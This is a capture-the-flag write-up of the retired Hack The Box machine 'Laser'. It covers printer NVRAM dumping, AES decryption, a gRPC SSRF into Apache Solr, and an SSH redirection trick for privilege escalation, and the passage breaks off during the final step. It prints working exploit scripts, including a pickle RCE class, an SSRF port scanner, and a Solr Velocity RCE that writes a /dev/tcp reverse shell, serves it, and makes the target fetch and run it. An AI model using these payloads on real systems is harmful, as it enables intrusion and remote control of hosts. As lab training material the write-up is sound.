Hack The Box - Laser Writeup
Laser is an Insane-tier vulnerable Linux virtual machine, created by MrR3boot & r4j.
The goal of my participation in Hack The Box is to learn which tools are used for analysis and exploitation of a variety of protocols, and how to use them efficiently. A side goal is to be exposed to unfamiliar software.
Summary
Name | Laser |
Creators | MrR3boot & r4j |
IP Address | 10.10.10.201 |
OS | Linux |
Release Date | 2020-08-08 |
Retirement Date | 2020-12-19 |
Difficulty | Insane (50 points) |
Firstly, we discover that printers are vulnerable, and decrypt a secret. Afterwards, we learn about protocol buffers, and break into a vulnerable internal service using a SSRF issue. Lastly, we stumble into a container thanks to a race condition, and redirect a cronjob to operate as root
on the host, instead of within the container.
I enjoyed the foothold stage of this box the most - which is rare for me!
Initial Reconnaissance
Running nmap
First thing, as always, I'll add the machine to /etc/hosts
, and run nmap
.
> nmap -T4 laser.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-xx-xx xx:xx XXXX
Nmap scan report for laser.htb (10.10.10.201)
Host is up (0.019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
9000/tcp open cslistener
9100/tcp open jetdirect
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
In this case, the quickest scan reveals all accessible ports. Ignoring SSH, both of those other port service detection guesses appear as though they may not be revealing the full picture. Let's look them up in the IANA database.
9000
-CSListener
(not very interesting)9100
-Printer PDL Data Stream
(...)
Port 9100
is... a printer!
Let's go break into the printer.
Sounds like a lot of fun, actually.
Your Printer Is Vulnerable
Researching Printer Attacks
The first recent item that turns up in google for hacking printers is Printer Exploitation Toolkit (PRET).
It supports two protocols; PostScript (PS), and Printer Job Language (PJL). PJL is the protocol that connects sucessfully on port 9100.
From reading some documentation, it appears as though I can dump NVRAM on the printer.
Information disclosure | Memory access | PJL | PRET command: nvram dump
After performing the dump (output below), it is clear that this laser
"printer" has nvram
, and that the nvram
contains a secret key.
Finding The Key
> ~/packages/PRET/pret.py laser.htb pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.40
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 pentesting tool that made
|-||/_____\||-. | |´ dumpster diving obsolete‥ 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to laser.htb established
Device: LaserCorp LaserJet 4ML
Welcome to the pret shell. Type help or ? to list commands.
laser.htb:/> nvram
NVRAM operations: nvram <operation>
nvram dump [all] - Dump (all) NVRAM to local file.
nvram read addr - Read single byte from address.
nvram write addr value - Write single byte to address.
laser.htb:/> nvram dump
Writing copy to nvram/laser.htb
....................--[[snip]]--......................................
.....................................k...e....y.....13vu94r6..643rv19u
laser.htb:/>
I have no idea what those dots represent, so let's examine the "copy" at nvram/laser.htb
.
> hexdump -C nvram/laser.htb
0000 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e |................|
--[[snip]]--
0440 2e 2e 6b 2e 2e 2e 65 2e 2e 2e 2e 79 2e 2e 2e 2e |..k...e....y....|
0450 2e 31 33 76 75 39 34 72 36 2e 2e 36 34 33 72 76 |.13vu94r6..643rv|
0460 31 39 75 |19u|
0463
The dots represent nothing special, it would appear. The key appears useful.
Printers Have Filesystems
There is also a filesystem! PRET allows you to dump all of the files (which is just one file) with a single mirror
command.
laser.htb:/> mirror
Creating mirror of /
Traversing pjl/
Traversing pjl/jobs/
0:/pjl/jobs/queued -> /home/simon/packages/PRET/mirror/laser.htb/0/pjl/jobs/queued
172199 bytes received.
This file starts with a b'
, and ends with a '^M
...
Strip those, and base64 decode succeeds.
Note: that's Python "binary string" syntax. We may be looking at some Python scripts later on?
In enumeration, I also find a reference to AES:
laser.htb:/> info variables
--[[snip]]--
LPARM:ENCRYPTION MODE=AES [CBC]
The "key" is the right 128-bit length for an AES-CBC-128 cipher... But where is the IV?
Decryption Woes
The above key in ASCII needs to be represented in hexadecimal, for the sake of openssl's input.
31337675393472363634337276313975
> openssl enc -d -aes-128-cbc -in queued-decoded -out queued-fin -K 31337675393472363634337276313975 -iv 0
139703284073728:error:0606506D:digital envelope routines:EVP_DecryptFinal_ex:wrong final block length:../crypto/evp/evp_enc.c:572:
What is this error about block length about?
Turns out the file isn't divisible by 16 bytes (128 bits). It's 8 bytes too long...
After messing about with removing the LAST 8 bytes and running an IV randomisation on a few million decryption attempts, I found nothing.
I also modified PRET to scan up to index 1000000 of the NVRAM, instead of stopping at 65535; the server's responses looped over the same 0-65535 space, so no success in finding the IV there.
Some Hours Later...
Finding The Correct Bytes
So, I eventually removed the FIRST eight bytes of the file instead, and tried iv = 0
again.
And I received as output a file that looks like a PDF! Of course, printers and PDF documents go hand in hand...
> tail -c +9 queued-decoded > queued-shortened
> openssl enc -d -aes-128-cbc -in queued-shortened -out queued-fin -K 31337675393472363634337276313975 -iv 0
> head queued-fin
M7%PDF-1.4
%
1 0 obj
<</Creator (Mozilla/5.0 \(Windows NT 10.0; Win64; x64\) AppleWebKit/537.36 \(KHTML, like Gecko\) Typora/0.9.86 Chrome/76.0.3809.146 Electron/6.1.4 Safari/537.36)
/Producer (Skia/PDF m76)
/CreationDate (D:20200629084907+00'00')
/ModDate (D:20200629084907+00'00')>>
endobj
3 0 obj
<</ca 1
Editor's Note: The 16 bytes after the first 8 bytes were, in fact, the correct IV. It just so happens that leaving the IV as the first 128-bit block in the file, while setting the IV to 0 in the decryption, allows the decryption to succeed.
This is because, in CBC mode, the previous ciphertext block is used as the IV to encrypt the next block!
Lesson learnt - if an IV of length n
is required, try the first n
bytes of the file.
After removing 16 more bytes from the decrypted file, until the magic chars "%PDF"...
> tail -c +17 queued-fin > feed-engine.pdf
We can read a description of the service on port 9000, delivered below in text form!
Shifting To Port 9000
What Is Feed Engine?
Feed Engine v1.0
(Progress Update : 18-06-2020)
Description
Used to parse the feeds from various sources (Printers, Network devices, Web servers and other connected devices). These feeds can be used in checking load balancing, health status, tracing.
Usage
To streamline the process we are utilising the Protocol Buffers and gRPC framework.
The engine runs on 9000 port by default. All devices should submit the feeds in serialized format such that data transmission is fast and accurate across network.
We defined a Print service which has a RPC method called Feed . This method takes Content as input parameter and returns Data from the server.
The Content message definition specifies a field data and Data message definition specifies a field feed .
On successful data transmission you should see a message.
...
return service_pb2.Data(feed='Pushing feeds')
...
Here is how a sample feed information looks like.
{
"version": "v1.0",
"title": "Printer Feed",
"home_page_url": "http://printer.laserinternal.htb/",
"feed_url": "http://printer.laserinternal.htb/feeds.json",
"items": [
{
"id": "2",
"content_text": "Queue jobs"
},
{
"id": "1",
"content_text": "Failed items"
}
]
}
QA with Clients
Gabriel (Client) : What optimisation measures you've taken ?
Victor (Product Manager) : This is main aspect where we completely relied on gRPC framework which has low latency, highly scalable and language independent.
John (Client) : What measures you take while processing the serialized feeds ?
Adam (Senior Developer) : Well, we placed controls on what gets unpickled. We don't use builtins and any other modules.
Release Info
Currently we are working on v1.0 with basic feature which includes rendering feeds on dashboard.
Bugs
1. Error handling in _InactiveRPCError
2. Connection timeout issues
3. Forking issues
4. Issue raised by clients in last update
Todo
1. Fork support to increase efficiency for more clients
2. Data delivery in more formats
3. Dashboard design and some data analytics
4. Merge staging core to feed engine
Obviously the protocol notes are important, but I am also introduced to two potential usernames:
- Adam (most likely), and
- Victor.
Not to mention the internal domain laserinternal.htb!
Researching gRPC
After reading up on gRPC a little, I found a description of how to create the 'service', 'method', and 'messages' that were described in the PDF.
We defined a Print service which has a RPC method called Feed . This method takes Content as input parameter and returns Data from the server.
The Content message definition specifies a field data and Data message definition specifies a field feed .
I built a few variants of the seemingly required .proto file, after finding a GUI tool called bloomrpc for testing a gRPC service. It was helpful to have a tool that spit out useful errors when my file was not parseable, showed me the intended structure of a message definition, and gave me the terms to look up in the PDF's description.
A few mistakes I made while structuring this file were:
- using a
package
line without realising it was optional, - defining a service and method without the message types, and
- incorrect capitalisation.
I eventually had a successful proto file! I thought this would take longer.
syntax = "proto2";
message Content {
required string data = 1;
}
message Data {
required string feed = 1;
}
service Print {
rpc Feed(Content) returns (Data) {}
}
The speed at which this was accomplished implies that a Google protocol is simple and elegant, which is surely not the case. I will have to do further research in order to become frustrated with the byzantine complexity which I am convinced gRPC must have, despite minor evidence to the contrary.
Exploring the gRPC server
Moving on.
Submitting a {"data":"Hello"}
message to the service with this file returned the following error:
{
"error": "2 UNKNOWN: Exception calling application: Invalid base64-encoded string: number of data characters (21) cannot be 1 more than a multiple of 4"
}
Alright, let's encode.
> echo "hello" | base64
aGVsbG8K
After trying out a base64 encoded payload, I had another interesting error message:
{
"error": "2 UNKNOWN: Exception calling application: A load persistent id instruction was encountered,\nbut no persistent_load function was specified."
}
Googling the message led me to references to unpickling in Python. So, it appears that I need to find a vulnerability in their unpickling!
The PDF shows a JSON sample of some "feed" data, which I assume is pickled as input? It doesn't look like output.
To Pickle, Or Not To Pickle
Generating A gRPC Client
I used the Python gRPC instructions to generate a client and server from the proto file.
> sudo apt install python3-grpcio
> mkdir client; cd client
> python3 -m grpc_tools.protoc -I../ --python_out=. --grpc_python_out=. ../print.proto
Then, I started scripting in a separate file "print.py" in the same directory.
import print_pb2, print_pb2_grpc, grpc, sys
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = print_pb2_grpc.PrintStub(channel)
response = stub.Feed(print_pb2.Content(data=sys.argv[1]))
print(response)
This is enough to query the service from code. After experimenting with payloads from the command line, I added some adjustments along the lines of some reference articles on unpickling vulnerabilities.
Evil gRPC Client
import print_pb2, print_pb2_grpc, grpc, sys
class Exploit(object):
def __reduce__(self):
return (eval, ('eval(compile("import os;os.system(\\"ls\\")","q","exec"))',))
import base64,pickle
shellcodeClass = pickle.dumps(Exploit())
def run(pickle):
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = print_pb2_grpc.PrintStub(channel)
response = stub.Feed(print_pb2.Content(data=pickle))
print(response)
if len(sys.argv) > 1:
if "-c" in sys.argv[1]:
print("Exploit class")
print(shellcodeClass)
run(base64.b64encode(shellcodeClass).decode('ascii'))
else:
print("Custom arg")
run(sys.argv[1])
Now that I have a useful custom client, it is much easier to experiment with unpickling.
> python3 print.py -c
Exploit class
b'c__builtin__\neval\np0\n(Veval(compile("import os;os.system(\\u005c"ls\\u005c")","q","exec"))\np1\ntp2\nRp3\n.'
Traceback (most recent call last):
File "print.py", line 43, in <module>
run(base64.b64encode(shellcodeClass).decode('ascii'))
File "print.py", line 36, in run
response = stub.Feed(print_pb2.Content(data=pickle))
File "/usr/lib/python3/dist-packages/grpc/_channel.py", line 826, in __call__
return _end_unary_response_blocking(state, call, False, None)
File "/usr/lib/python3/dist-packages/grpc/_channel.py", line 729, in _end_unary_response_blocking
raise _InactiveRpcError(state)
grpc._channel._InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNKNOWN
details = "Exception calling application: 'Module is disabled'"
debug_error_string = "{"created":"@160xxxxxxx.679946436","description":"Error received from peer ipv4:10.10.10.201:9000","file":"src/core/lib/surface/call.cc","file_line":1055,"grpc_message":"Exception calling application: 'Module is disabled'","grpc_status":2}"
>
Tried a few unpickling possibilities using sys.*
, os.*
, open
, and other functions, including functions from python's builtins
. The consistent error message is Exception calling application: 'Module is disabled'
I was not successful in finding a path to RCE that doesn't require a module. This was foreshadowed in the PDF, of course.
Adam (Senior Developer) : Well, we placed controls on what gets unpickled. We don't use builtins and any other modules.
Let's Try Something Different
Submitting JSON
Turns out, the JSON data structure in the PDF is the input, and it is useful to send it in! There is a request made to whichever URL you place in the feed_url
parameter upon submission :)
#!/usr/bin/env python3
import base64, pickle
import print_pb2, print_pb2_grpc, grpc
sample = """{
"feed_url": "http://10.10.14.25:8000/feeds.json",
}"""
channel = grpc.insecure_channel('10.10.10.201:9000')
def run(pickle):
stub = print_pb2_grpc.PrintStub(channel)
response = stub.Feed(print_pb2.Content(data=pickle))
print(response)
pickled = pickle.dumps(sample)
run(base64.b64encode(pickled).decode('ascii'))
The data has to be sent as a JSON string and not as a dict, or the following error message is sent.
Exception calling application: the JSON object must be str, bytes or bytearray, not dict
The user agent of the request is FeedBot v1.0
. A quick search reveals that this is meaningless.
An Error Prompts Understanding
While banging against this brick wall, I noticed that there is an error returned when the connection is refused by the remote host:
Traceback (most recent call last):
[...snip...]
File "/usr/lib/python3/dist-packages/grpc/_channel.py", line 729, in _end_unary_response_blocking
raise _InactiveRpcError(state)
grpc._channel._InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.UNKNOWN
details = "Exception calling application: (7, 'Failed to connect to 10.10.14.25 port 8000: Connection refused')"
debug_error_string = "{"created":"@160xxxxxxx.062819068","description":"Error received from peer ipv4:10.10.10.201:9000","file":"src/core/lib/surface/call.cc","file_line":1055,"grpc_message":"Exception calling application: (7, 'Failed to connect to 10.10.14.25 port 8000: Connection refused')","grpc_status":2}"
Fun fact about that error code #7... It looks like an error that curl
might produce!
> curl http://10.10.14.25:8000/fsdfs
curl: (7) Failed to connect to 10.10.14.25 port 8000: Connection refused
Based on the usage of curl
, I might be able to use some gopher://
trickery (as learnt from the Travel box) to get an internal SSRF going.
It's Arm Day At The Gym
Using Curls To Scan Ports
To figure out a worthwhile target within the box, I'll need to do some port scanning.
I wrote a script based on print.py for this purpose.
#!/usr/bin/env python3
import base64, pickle
import print_pb2, print_pb2_grpc, grpc
sample = """{
"feed_url": "http://localhost:%d/",
}"""
channel = grpc.insecure_channel('10.10.10.201:9000')
def run(pickle):
stub = print_pb2_grpc.PrintStub(channel)
response = stub.Feed(print_pb2.Content(data=pickle))
print("Scanning ports:")
for port in range(1,65535):
try:
pickled = pickle.dumps(sample % (port))
run(base64.b64encode(pickled).decode('ascii'))
print("\n** Port {} open\n".format(port))
except Exception as err:
if "Connection refused" in err.details():
print("Port {} closed".format(port), end='\r')
else:
print("Port {} returned strange error:".format(port), err.details())
Running this produces a few numbers after some minutes have passed:
SSRF Port Scanner Results
> python3 portscan.py
Scanning ports:
Port 22 returned strange error: Exception calling application: (1, 'Received HTTP/0.9 when not allowed\n')
Port 7983 returned strange error: Exception calling application: (52, 'Empty reply from server')
** Port 8983 open
Port 9000 returned strange error: Exception calling application: (1, 'Received HTTP/0.9 when not allowed\n')
Port 9100 returned strange error: Exception calling application: (1, 'Received HTTP/0.9 when not allowed\n')
** Port 45017 open
As far as IANA cares, 45017 is unassigned.
7983 is interesting, but 8983 stands out.
Port 8983 Is Open
So, what would run on port 8983?
IANA registered for: Apache Solr 1.4
Let's see what issues might be present!
> searchsploit solr
------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------ ---------------------------------
Apache Solr - Remote Code Execution via V | multiple/remote/48338.rb
Apache Solr 7.0.1 - XML External Entity E | xml/webapps/43009.txt
Apache Solr 8.2.0 - Remote Code Execution | java/webapps/47572.py
Solr 3.5.0 - Arbitrary Data Deletion | java/webapps/39418.txt
------------------------------------------ ---------------------------------
Shellcodes: No Results
Two recent RCE modules? I'm spoilt!
Blind Man's SSRF
Analysing Solr RCE
I'll take a look at the Python exploit source code, located in the following path on Kali Linux.
/usr/share/exploitdb/exploits/java/webapps/47572.py
Looks like it creates a "node" and executes some code on it.
Editor's Note: it is in fact modifying a setting on an existing "node", and then exploiting an issue made possible by the setting
It doesn't appear that I can directly use this script, due to the write-only nature of the SSRF.
Since I am blind (no response data), I can't check the version of the server. Let's assume that I can use this exploit for now. If I'm wrong, I can try harder!
Analysing the requests generated by the exploitdb script shows that only two are required:
- First request goes to
/solr/{node}/config
with some json POST data, in order to modify a template setting. - Second request goes to
/solr/{node}/select
as a GET request, with a lot of java directed at the template, wrapping a payload to be executed by the host OS shell.
So, being blind, how do I find the correct node name?
Finding The Core Name
First, let's try doing the fancy requests using some keywords from the PDF.
dashboard, core, feedengine, feed-engine, engine, feed, staging, source, sources, data, analytics
It appears that I receive the same "successful" responses to requests regardless of the name. Oh well...
Hang on. The exploit in Solr involves "nodes", but there are also references to "cores" in the Solr documentation...
There's a line in the PDF related to this:
4. Merge staging core to feed engine
I think I know the name!
Solr Exploit Through gRPC
Based on that, I spent a while writing a blind exploit script for Apache Solr, based on the two requests listed in the exploit-db script.
#!/usr/bin/env python3
# run a revshell locally on port 4444 to grab a connection
# for host's IP address
import netifaces as ni
# for serving http
from http.server import HTTPServer, SimpleHTTPRequestHandler
import threading, os
# for pickling and packet sending
import urllib.parse
import base64,pickle
import print_pb2, print_pb2_grpc, grpc
# Grab the local IP address for revshell purposes
interface = [i for i in ni.interfaces() if 'tun' in i][0]
ipaddress = str(ni.ifaddresses(interface)[ni.AF_INET][0]['addr'])
with open('ex.sh', 'w') as revshell:
revshell.writelines(['#!/usr/bin/env bash\n',
'bash -i >& /dev/tcp/{}/4444 0>&1\n'.format(ipaddress)])
# Exploit commands
stage1 = 'wget {}:9200/ex.sh -O /tmp/ex.sh'.format(ipaddress)
stage2 = 'bash /tmp/ex.sh'
# Run a HTTP server in the current directory, in a new thread
def start_server(path, port):
'''Start a simple webserver serving path on port'''
os.chdir(path)
httpd = HTTPServer(('', port), SimpleHTTPRequestHandler)
httpd.serve_forever()
daemon = threading.Thread(name='daemon_server',
target=start_server,
args=('.', 9200))
daemon.setDaemon(True) # Set as a daemon, will die with the main thread.
daemon.start()
# Exploit wrappers
sample = """{{
"feed_url": "{}://localhost:8983/{}"
}}"""
# Exploit enabling command (content-length = 218 + 2 for the \r\n at the end)
nodeconf = ('0POST /solr/staging/config HTTP/1.1\r\n'
'Host: localhost:8983\r\n'
'Connection: close\r\n'
'Content-Length: 220\r\n\r\n'
'{"update-queryresponsewriter": {'
'"startup": "lazy", '
'"name": "velocity", '
'"class": "solr.VelocityResponseWriter", '
'"template.base.dir": "", '
'"solr.resource.loader.enabled": "true", '
'"params.resource.loader.enabled": "true"'
'}}')
# Return a wrapper request for executing shell command
def exploit(cmd):
return ("solr/staging/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
"%23set($x=%27%27)+"
"%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+"
"%23set($chr=$x.class.forName(%27java.lang.Character%27))+"
"%23set($str=$x.class.forName(%27java.lang.String%27))+"
"%23set($ex=$rt.getRuntime().exec(%27" + urllib.parse.quote(cmd, safe='') +
"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+"
"%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")
# Calling the gRPC method
channel = grpc.insecure_channel('10.10.10.201:9000')
def run(pickle):
stub = print_pb2_grpc.PrintStub(channel)
response = stub.Feed(print_pb2.Content(data=pickle))
# Attempt exploit sequence
try:
nodepickled = pickle.dumps(sample.format('gopher', urllib.parse.quote(nodeconf)))
run(base64.b64encode(nodepickled).decode())
exploitpickled = pickle.dumps(sample.format('http', exploit(stage1)))
run(base64.b64encode(exploitpickled).decode())
exploitpickled = pickle.dumps(sample.format('http', exploit(stage2)))
run(base64.b64encode(exploitpickled).decode())
print('It may have worked...')
except Exception as err:
if 'Connection refused' in err.details():
print('Port closed?')
else:
print('Solr returned strange error:', err.details())
print(err)
This iteration of the script finally worked!
> nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.83] from laser.htb [10.10.10.201] 50594
bash: cannot set terminal process group (1088): Inappropriate ioctl for device
bash: no job control in this shell
solr@laser:/opt/solr/server$
Some issues I encountered while iterating on it:
- I initially generated the first request using
curl
. TheConnection: close
header was required for the first request, and was not present in thecurl
output. The exploit hangs silently without it. - I wasn't able to directly execute a pipe-based reverse shell.
nc
did not appear to be available.
Editor's Note: nc
was available, and in the PATH
. However, it was a version without the -e parameter!
solr@laser:/opt/solr/server$ nc 10.10.14.83 3333 -e /bin/bash
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
The multi-stage payload was the simplest solution I could think of to bypass any execution issues.
Solr Eclipsed
We Have user.txt
I am now done with Apache Solr, and I have the ability to read the flag at /home/solr/user.txt
!
No users named Adam or Victor are found in the system. From here, it's time for some internal recon.
There are three Solr directories. /opt/solr
, /var/solr
and /home/solr
.
As a point of interest, I found the feed engine application in the /home/solr/feed_engine
directory.
I sent this back to the attacking host and had a read of the code. It was nice to see I didn't miss anything obvious while exploiting it.
Other than that, my filesystem enumeration was not successful; the host did not have much information available in the filesystem that I was able to see.
Cron-ic Fatigue
However, during further enumeration, I found some interesting activity in the following (abbreviated) pspy
report every 10 seconds.
It's often worth running pspy
, as any interesting recurrant process will show up in the listing over time.
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270238 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/graphql-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270239 | scp /opt/updates/files/graphql-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:34 CMD: UID=105 PID=2270242 | sshd: [net]
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270241 | sshd: [accepted]
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270257 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/apiv2-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270258 | scp /opt/updates/files/apiv2-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270260 | /usr/sbin/sshd -R
2020/xx/xx xx:48:34 CMD: UID=105 PID=2270261 | sshd: [net]
2020/xx/xx xx:48:34 CMD: UID=??? PID=2270263 | ???
2020/xx/xx xx:48:34 CMD: UID=??? PID=2270262 | ???
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270277 | scp /opt/updates/files/jenkins-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270276 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/jenkins-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270279 | /usr/sbin/sshd -R
2020/xx/xx xx:48:34 CMD: UID=0 PID=2270282 | run-parts --lsbsysinit /etc/update-motd.d
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270295 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/dashboard-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270296 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/dashboard-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270298 | /usr/sbin/sshd -R
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270301 | run-parts --lsbsysinit /etc/update-motd.d
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270315 | scp /opt/updates/files/bug-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270314 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/bug-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270317 | /usr/sbin/sshd -R
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270321 |
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270336 | scp /opt/updates/files/postgres-feed root@172.18.0.2:/root/feeds/
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270335 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/postgres-feed root@172.18.0.2:/root/feeds/
--[[snip]]--
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270338 | /usr/sbin/sshd -R
2020/xx/xx xx:48:35 CMD: UID=105 PID=2270339 | sshd: root [net]
2020/xx/xx xx:48:35 CMD: UID=0 PID=2270354 | sleep 10
There are enough mentions of containers in other sections of the process log that I suspect 172.18.0.2
to be a container. Annoyingly, the "password" of zzz's is ineffective - however I now know that this container exists. I'll hang around and wait to see some more cron jobs.
We quickly spot the Apache Solr exploit being undone every few minutes! Sneaky :)
2020/xx/xx xx:51:02 CMD: UID=0 PID=2272286 | curl -i -s -k -X POST -H Host: localhost:8983 -H Content-Type: application/json --data { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "false", "params.resource.loader.enabled": "false" }} http://localhost:8983/solr/staging/config
2020/xx/xx xx:51:02 CMD: UID=0 PID=2272291 | curl -i -s -k -X POST -H Host: localhost:8983 -H Content-Type: application/json --data { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "false", "params.resource.loader.enabled": "false" }} http://localhost:8983/solr/development/config
There is also a mention of a script, by the name of '/tmp/clear.sh':
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281078 | scp /root/clear.sh root@172.18.0.2:/tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281112 | ssh root@172.18.0.2 /tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281111 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 /tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281130 | ssh root@172.18.0.2 rm /tmp/clear.sh
2020/xx/xx xx:03:02 CMD: UID=0 PID=2281129 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 rm /tmp/clear.sh
Not sure what is going on here as far as copying and removing this script over and over...
Hurry, Cover It With Zzz's!
Race Condition In sshpass
Eventually, I note a slightly more realistic looking password appear in the logs:
2020/xx/xx xx:53:39 CMD: UID=0 PID=2274073 | sshpass -p c413d115b3d87664499624e7826d8c5a scp /opt/updates/files/bug-feed root@172.18.0.2:/root/feeds/
I think this may be unintended, will circle back to find another route later.
Editor's Note: This appears to have been the intended route. sshpass
is insecure and cannot be secured against the race condition demonstrated above; it attempts to remove the password from the process arguments, but does not always succeed in time for any monitoring or logging. Use keys, not commandline passwords!
However, I think that this can be used to progress.
Let's try to ssh in over the unstable nc reverse shell first, just to see if it works.
solr@laser:/opt/solr/server$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
Pseudo-terminal will not be allocated because stdin is not a terminal.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
ls
feeds
pwd
/root
whoami
root
Cool?
So, the host system is connecting over ssh
into this container, every 10 seconds.
What if I used the root
access on the container, to trick the host system into sending the ssh
connection somewhere else?
That wouldn't generally be possible. Default ssh
settings check the host key upon connection in order to confirm that the host is the exact host expected as per prior connections.
Let's check the uncommented lines in the configuration anyway.
solr@laser:~/.ssh$ sed -n '/^[^#]/p' /etc/ssh/ssh_config
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
StrictHostKeyChecking no
solr@laser:~/.ssh$
Critically, StrictHostKeyChecking
is disabled! How convenient. And how lucky I am to have checked this before getting stuck in a different rabbit hole.
When StrictHostKeyChecking
is set to no
, host keys are not checked upon connecting, and are added automatically to the ~/.ssh/known_hosts
file. This is considered insecure by NASA (and everyone else). With this insecure setting, an ssh
man-in-the-middle attack is easily possible.
In this case, the implication of this setting is that I am able to redirect the connection to another host. For instance, I can use pipes to create a mirror, and cause the host to connect to... itself! Cute.
Stop Authenticating Yourself!
Returning ssh To Sender
This is only possible because the ssh
key for root
is, in this configuration, both used by the host's root
user, and accepted for authentication by the host's root
user.
solr@laser:~$ ifconfig | grep inet -B1
br-3ae8661b394c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
inet6 fe80::42:47ff:fe9d:969e prefixlen 64 scopeid 0x20<link>
--
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
--
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.201 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:d158 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:d158 prefixlen 64 scopeid 0x20<link>
The local bridge address 172.18.0.1 is the address of the host from the perspective of the docker
container, as it has the same network part (172.18.0.0/16
) as the container.
Notably, there is a copy of nc
in the /tmp folder of the container. Helpful. We should be able to pipe the ssh
connection around with that.
editor's note: two(!) separate copies of socat were lying around on the docker container when I was attacking. please delete your tracks, people!
For reference, the relevant commands are replicated below. These are run by the host machine on the docker container through ssh
.
scp /root/clear.sh /tmp/clear.sh
bash /tmp/clear.sh
rm /tmp/clear.sh
All are performed in quick succession, as they are picked up by pspy within the same second.
You would think that the file will be overwritten by the scp command every time. This is Linux though, and I am root
... We can start by changing the file to read only, and if that doesn't work, there may be an opportunity for some fancy ACLs such as setfacl -m u:root:r /tmp/clear.sh
to block the overwrite.
